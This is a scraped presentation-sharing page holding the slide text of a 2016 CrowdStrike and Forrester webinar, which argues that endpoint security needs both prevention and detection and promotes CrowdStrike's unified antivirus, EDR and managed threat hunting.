Data Science Transforming Security Operations
 
OSB50: Operational Security: State of the Union
OSB50: Operational Security: State of the UnionOSB50: Operational Security: State of the Union
OSB50: Operational Security: State of the Union
 
A Buyers Guide to Investing in Endpoint Detection and Response for Enterprise...
A Buyers Guide to Investing in Endpoint Detection and Response for Enterprise...A Buyers Guide to Investing in Endpoint Detection and Response for Enterprise...
A Buyers Guide to Investing in Endpoint Detection and Response for Enterprise...
 
CounterTack: 10 Experts on Active Threat Management
CounterTack: 10 Experts on Active Threat ManagementCounterTack: 10 Experts on Active Threat Management
CounterTack: 10 Experts on Active Threat Management
 
Threat Hunting - Moving from the ad hoc to the formal
Threat Hunting - Moving from the ad hoc to the formalThreat Hunting - Moving from the ad hoc to the formal
Threat Hunting - Moving from the ad hoc to the formal
 
Webinar: Get Ready to Detect, Respond & Recover from a Cyber Attack
Webinar: Get Ready to Detect, Respond & Recover from a Cyber AttackWebinar: Get Ready to Detect, Respond & Recover from a Cyber Attack
Webinar: Get Ready to Detect, Respond & Recover from a Cyber Attack
 
Introduction to MicroSolved, Inc.
Introduction to MicroSolved, Inc.Introduction to MicroSolved, Inc.
Introduction to MicroSolved, Inc.
 
LogRhythm_-_Modern_Cyber_Threat_Pandemic.pptx
LogRhythm_-_Modern_Cyber_Threat_Pandemic.pptxLogRhythm_-_Modern_Cyber_Threat_Pandemic.pptx
LogRhythm_-_Modern_Cyber_Threat_Pandemic.pptx
 
Webinar - Bitglass and CyberEdge - Hidden Security Threats
Webinar - Bitglass and CyberEdge - Hidden Security ThreatsWebinar - Bitglass and CyberEdge - Hidden Security Threats
Webinar - Bitglass and CyberEdge - Hidden Security Threats
 
Next-level mobile app security: A programmatic approach
Next-level mobile app security: A programmatic approachNext-level mobile app security: A programmatic approach
Next-level mobile app security: A programmatic approach
 
Ponemon Report: Cyber Security Incident Response: Are we as prepared as we th...
Ponemon Report: Cyber Security Incident Response: Are we as prepared as we th...Ponemon Report: Cyber Security Incident Response: Are we as prepared as we th...
Ponemon Report: Cyber Security Incident Response: Are we as prepared as we th...
 

Mais de CrowdStrike

Cyber Security Extortion: Defending Against Digital Shakedowns
Cyber Security Extortion: Defending Against Digital Shakedowns Cyber Security Extortion: Defending Against Digital Shakedowns
Cyber Security Extortion: Defending Against Digital Shakedowns
CrowdStrike
 
An Inside Look At The WannaCry Ransomware Outbreak
An Inside Look At The WannaCry Ransomware OutbreakAn Inside Look At The WannaCry Ransomware Outbreak
An Inside Look At The WannaCry Ransomware Outbreak
CrowdStrike
 
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond AlertingProactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
CrowdStrike
 
DEFENDING AGAINST THREATS TARGETING THE MAC PLATFORM
DEFENDING AGAINST THREATS TARGETING THE MAC PLATFORMDEFENDING AGAINST THREATS TARGETING THE MAC PLATFORM
DEFENDING AGAINST THREATS TARGETING THE MAC PLATFORM
CrowdStrike
 
CrowdCasts Monthly: You Have an Adversary Problem
CrowdCasts Monthly: You Have an Adversary ProblemCrowdCasts Monthly: You Have an Adversary Problem
CrowdCasts Monthly: You Have an Adversary Problem
CrowdStrike
 
TOR... ALL THE THINGS
TOR... ALL THE THINGSTOR... ALL THE THINGS
TOR... ALL THE THINGS
CrowdStrike
 
End-to-End Analysis of a Domain Generating Algorithm Malware Family Whitepaper
End-to-End Analysis of a Domain Generating Algorithm Malware Family WhitepaperEnd-to-End Analysis of a Domain Generating Algorithm Malware Family Whitepaper
End-to-End Analysis of a Domain Generating Algorithm Malware Family Whitepaper
CrowdStrike
 
TOR... ALL THE THINGS Whitepaper
TOR... ALL THE THINGS WhitepaperTOR... ALL THE THINGS Whitepaper
TOR... ALL THE THINGS Whitepaper
CrowdStrike
 

Mais de CrowdStrike (9)

Cyber Security Extortion: Defending Against Digital Shakedowns
Cyber Security Extortion: Defending Against Digital Shakedowns Cyber Security Extortion: Defending Against Digital Shakedowns
Cyber Security Extortion: Defending Against Digital Shakedowns
 
An Inside Look At The WannaCry Ransomware Outbreak
An Inside Look At The WannaCry Ransomware OutbreakAn Inside Look At The WannaCry Ransomware Outbreak
An Inside Look At The WannaCry Ransomware Outbreak
 
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond AlertingProactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
 
DEFENDING AGAINST THREATS TARGETING THE MAC PLATFORM
DEFENDING AGAINST THREATS TARGETING THE MAC PLATFORMDEFENDING AGAINST THREATS TARGETING THE MAC PLATFORM
DEFENDING AGAINST THREATS TARGETING THE MAC PLATFORM
 
CrowdCasts Monthly: Going Beyond the Indicator
CrowdCasts Monthly: Going Beyond the IndicatorCrowdCasts Monthly: Going Beyond the Indicator
CrowdCasts Monthly: Going Beyond the Indicator
 
CrowdCasts Monthly: You Have an Adversary Problem
CrowdCasts Monthly: You Have an Adversary ProblemCrowdCasts Monthly: You Have an Adversary Problem
CrowdCasts Monthly: You Have an Adversary Problem
 
TOR... ALL THE THINGS
TOR... ALL THE THINGSTOR... ALL THE THINGS
TOR... ALL THE THINGS
 
End-to-End Analysis of a Domain Generating Algorithm Malware Family Whitepaper
End-to-End Analysis of a Domain Generating Algorithm Malware Family WhitepaperEnd-to-End Analysis of a Domain Generating Algorithm Malware Family Whitepaper
End-to-End Analysis of a Domain Generating Algorithm Malware Family Whitepaper
 
TOR... ALL THE THINGS Whitepaper
TOR... ALL THE THINGS WhitepaperTOR... ALL THE THINGS Whitepaper
TOR... ALL THE THINGS Whitepaper
 

Último

Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Orbitshub
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Orbitshub
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Jeffrey Haguewood
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Angeliki Cooney
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
 

Último (20)

Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 

You Can't Stop The Breach Without Prevention And Detection

  • 1. 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. YOU CAN’T STOP THE BREACH WITHOUT PREVENTION AND DETECTION CHRIS SHERMAN, SENIOR ANALYST, FORRESTER ROD MURCHISON, VP, PRODUCT MANAGEMENT, CROWDSTRIKE
  • 2. Mastering the Endpoint: Leverage Forrester’s Targeted Attack Hierarchy Of Needs Chris Sherman, Senior Analyst October 20th, 2016
  • 3. © 2016 Forrester Research, Inc. Reproduction Prohibited 3 The 90’s called, they want their endpoint security strategy back Despite… Anti-Virus Application patching 80% 63% 48% 42% of breaches involved a software exploit over the past year a 19% increase in costs associated with cyberattacks Y-Y Base: 671 IT and IT security practitioners. Source: Ponemon 2013 State of the Endpoint Survey Base: 881 IT Security Decision Makers. Source: Forrester BT Security Survey, Q3 2015 …Many organizations still rely heavily on antivirus. A New Approach Is Needed! 48% Application control 55% 53% Endpoint Visibility & Control
  • 4. © 2016 Forrester Research, Inc. Reproduction Prohibited 4 Organizations Must Refocus Their Endpoint Security Strategies
  • 5. © 2016 Forrester Research, Inc. Reproduction Prohibited 5 The Targeted-Attack Hierarchy Of Needs
  • 6. © 2016 Forrester Research, Inc. Reproduction Prohibited Targeted-Attack Hierarchy Of Needs Need No. 1: An Actual Security Strategy
  • 7. © 2016 Forrester Research, Inc. Reproduction Prohibited 7 Expense in Depth
  • 8. © 2016 Forrester Research, Inc. Reproduction Prohibited 8 Return on Expense in Depth?
  • 9. © 2016 Forrester Research, Inc. Reproduction Prohibited 9 Components of a sound strategy › Adopt principals of the Zero Trust model › Data driven security not alert driven security › Data driven security is really business driven security which is supported by executives
  • 10. © 2016 Forrester Research, Inc. Reproduction Prohibited Targeted-Attack Hierarchy Of Needs Need No. 2: A Dedication To Recruiting And Retaining Staff
  • 11. © 2016 Forrester Research, Inc. Reproduction Prohibited 11 Double down on higher education › There is intense competition between the emerging cyber programs › Make them more competitive; join advisory board drive curriculum that produces capable graduates
  • 12. © 2016 Forrester Research, Inc. Reproduction Prohibited Targeted-Attack Hierarchy Of Needs Need No. 3: A Focus On The Fundamentals
  • 13. © 2016 Forrester Research, Inc. Reproduction Prohibited 13 A Focus On The Fundamentals
  • 14. © 2016 Forrester Research, Inc. Reproduction Prohibited Targeted-Attack Hierarchy Of Needs Need No. 4: An Integrated Portfolio That Enables Orchestration
  • 15. © 2016 Forrester Research, Inc. Reproduction Prohibited 15 Friction? › “Create friction for the attacker. Slow them down and make their job more difficult.” › What about all the friction we create for ourselves? › Most orgs don’t have the resources to automate their InfoSec processes.
  • 16. © 2016 Forrester Research, Inc. Reproduction Prohibited 16 What can you do? › Invest in software development staff › Prioritize vendors that integrate and automate between the endpoint and network layers › Pay attention to vendors who see the need and are developing solutions.
  • 17. © 2016 Forrester Research, Inc. Reproduction Prohibited Targeted-Attack Hierarchy Of Needs Need No. 5: Prevention
  • 18. © 2016 Forrester Research, Inc. Reproduction Prohibited 18 Prevention is shifting › Traditional approaches to prevention will continue › If you can prevent an action, why not? › Prevention with threat intelligence • Command and Control indicators should be used to prevent communications
  • 19. © 2016 Forrester Research, Inc. Reproduction Prohibited 19 Prevention begins and ends with attack surface reduction Photo credit: Jan Stromme, Bloomberg Business
  • 20. © 2016 Forrester Research, Inc. Reproduction Prohibited Targeted-Attack Hierarchy Of Needs Need No. 6: Detection & Response
  • 21. © 2016 Forrester Research, Inc. Reproduction Prohibited 21 Detection › Detection is the only option when dealing with higher tier adversaries › No single control is your breach detection system › Your aggregate controls and your people are your breach detection system
  • 22. © 2016 Forrester Research, Inc. Reproduction Prohibited 22 Response › Once you have identified malicious activity, how do you respond? › Is your remediation a reimage? › Time to containment and remediation will never improve without automated response
  • 23. © 2016 Forrester Research, Inc. Reproduction Prohibited 23 To be successful, an endpoint security strategy must balance prevention with detection
  • 24. © 2016 Forrester Research, Inc. Reproduction Prohibited 24 Prevention Detection Control / Remediation Endpoint Security Requires A Balanced Approach
  • 25. © 2016 Forrester Research, Inc. Reproduction Prohibited 25 Prevention Detection Control / Remediation • Addresses attack surface • Limits time spent on detection/response • Doesn’t require frequent updates Endpoint Security Requires A Balanced Approach
  • 26. © 2016 Forrester Research, Inc. Reproduction Prohibited 26 Prevention Detection Control / Remediation • Addresses attack surface • Limits time spent on detection/response • Doesn’t require frequent updates • Endpoint visibility and integration • Catches what gets through • Threat intelligence required Endpoint Security Requires A Balanced Approach
  • 27. © 2016 Forrester Research, Inc. Reproduction Prohibited 27 Prevention Detection Control / Remediation • Addresses attack surface • Limits time spent on detection/response • Doesn’t require frequent updates • Endpoint visibility and integration • Catches what gets through • Threat intelligence required • Automated/assisted remediation reduces friction • Ensures policy compliance • Operationalizes threat intelligence Endpoint Security Requires A Balanced Approach
  • 28. © 2016 Forrester Research, Inc. Reproduction Prohibited 28 Recommendations › Choose prevention technologies based on your risk appetite and impact to user experience. › Look to expand your detection capabilities beyond malicious process identification and IOC identification › Reduce your attack surface through a balance of prevention, detection, and remediation proficiency.
  • 29. THE YING & YANG OF ENDPOINT PROTECTION § You need to see Prevention & Detection in a holistic way § There needs to be a virtuous approach - one feeds the other and vice-versa § You need to have a vision, from the outset to build this, you can’t just make this up as you go along PREVENTIONDETECTION
  • 30. Cloud Delivered Endpoint Protection MANAGED HUNTING ENDPOINT DETECTION AND RESPONSE NEXT-GEN ANTIVIRUS CrowdStrike is the only security technology provider to unify next-gen AV and EDR into a single agent, backed by 24/7 proactive threat hunting – all delivered via the cloud 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
  • 31. PREVENTIONBENEFITS PREVENTS ALL TYPES OF ATTACKS Protect against Known/Unknown Malware Protect Against Zero-Day Attacks Eliminate Ransomware No Signature Updates No User Impact—Less than 1% CPU overhead Reduce re-imaging time and costs BUSINESS VALUE Machine Learning IOA Behavioral Blocking Block Known Bad Exploit Mitigation 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
  • 32. CLASSIC EDR JUSTIFICATION: THERE IS NO SUCH THING AS 100% PREVENTION § Attacks will always get through § Even with 99% efficacy you still need something to deal with the 1% § So, you need EDR to deal with this and solve the ‘silent failure’ problem 1% missed 99% stopped 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
  • 33. WHAT 99% CAN MEAN… 33 Chanceofatleastonesuccess foradversary Number of attempts 1% >99% 500 Bottom line: change the binary 500 times and with 99% detection efficacy - you will get one file thru
  • 34. PREVENT AGAINST SILENT FAILURE DVR FOR ENDPOINT BUSINESS VALUE 5 Second Enterprise Search No Hardware or Storage Costs Full Spectrum Visibility Reduced Time to Remediation BENEFITS 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. DETECTION AND RESPONSE
  • 35. FINDING THE ADVERSARY So You Don’t Have To BREACH PREVENTION SERVICES Team of Hunters Working for You 24 x 7 BUSINESS VALUE Force Multiplier Community Immunity BENEFITS Reduce Alert Fatigue: Focus on What Matters! Stop the “Mega” Breach 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. MANAGED HUNTING
  • 36. SO YOU GOT DETECTION AND PREVENTION, WHY ARE YOU STILL DISAPPOINTED? § You can’t just slam two things together - detection & prevention § You can’t just tick a list of features where you check-off features § This is tough stuff, you need to be thoughtful and considered in how you architect a prevention and detection solution § You can’t see prevention and EDR as two separate things 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
  • 37. SO, WHERE DOES PREVENTION END & DETECTION START? 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. PREVENTIONDETECTION
  • 38. OVERVIEW OF WHAT’S REQUIRED TO PROPERLY UNIFY NEXT-GEN AV AND EDR 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. Complete and accurate visibility Analysis capacity 1 2 3 Ability to turn data into information and insight
  • 39. COMPLETE AND ACCURATE VISIBILITY § Data: Need lot’s of it § Scalability: In the Cloud § Power: Storage, throughput and compute power § Integrity: High fidelity § Usefulness: Insightful § Flexible Capture: distributed/mobile/ BYOD and or on/off network 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
  • 40. ANALYSIS CAPACITY § Organize and analyze big data § You need to analyze this at massive scale § You need to ‘glue’ all this data together § That’s why a ‘Graph’ is the answer 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
  • 41. ABILITY TO TURN DATA INTO INFORMATION AND INSIGHT § Piecing data together and establishing the relationships between drives ‘Context’ - the more data you have the ‘richer the context’ § Understanding context let’s you understand behavior and that allows you to get to IOA THREAT GRAPH Indicators of Attack EDR 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
  • 42. WHICH IN TURN MAKES BOTH PREVENTION AND EDR BETTER § IOA’s = better ‘prevention’ § IOA’s = defeat attackers who are ‘living of the land’ § Traditional malware and security approaches inadequate § IOA’s = better EDR and better EDR = better IOA’s
  • 43. SUMMARY § You need to see Prevention & Detection in a holistic way § There needs to be a virtuous approach - one feeds the other and vice-versa § You need to have a vision, from the outset to build this, you can’t just make this up as you go along
  • 44. NEW FORRESTER WAVE The Forrester Wave™: Endpoint Security, Q4 2016 The 15 Providers That Matter Most And How They Stack Up § CrowdStrike will be sending a copy to ALL webcast registrants 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
  • 45. Q&A 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. crowdcasts@crowdstrike.com